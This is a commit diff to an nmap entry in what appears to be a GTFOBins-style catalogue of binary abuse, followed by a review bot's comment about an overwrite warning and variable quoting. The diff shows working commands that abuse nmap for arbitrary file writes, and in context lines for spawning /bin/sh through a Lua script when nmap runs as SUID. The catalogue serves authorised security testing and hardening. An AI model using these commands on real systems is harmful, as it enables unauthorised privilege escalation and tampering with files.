Fix nmap SUID file-write

Andrea Cardaci 2021-01-04 08:58:56 +01:00
parent edc8a2d03d
commit 5b2d89b99a


@ -87,6 +87,10 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
- description: The payload appears inside the regular nmap output.
code: |
LFILE=file_to_write
nmap -oG=$LFILE DATA
file-read: file-read:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
@ -108,9 +112,9 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF ./nmap --script=$TF
- description: This will over-write files with nmap output, use with caution. suid:
- description: The payload appears inside the regular nmap output.
code: | code: |
sudo touch /etc/filecantbetouched LFILE=file_to_write
nmap 127.0.0.1 -oN=/etc/filecantbetouched ./nmap -oG=$LFILE DATA
cat /etc/filecantbetouched
--- ---
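Review bot: The rewritten `suid` entry in the second hunk drops the old caution "This will over-write files with nmap output, use with caution.", although the replacement `./nmap -oG=$LFILE DATA` still sends nmap's output to the file named by `$LFILE`, which as far as I know replaces any existing content by default. The new `file-write` entry in the first hunk has the same gap. I would keep the warning in both descriptions, for example `description: The payload appears inside the regular nmap output; the target file is overwritten, use with caution.`, so that someone reproducing this during an authorised assessment does not clobber a file by accident. As a style point, quote the expansion as `-oG="$LFILE"` so a path containing spaces is not word-split.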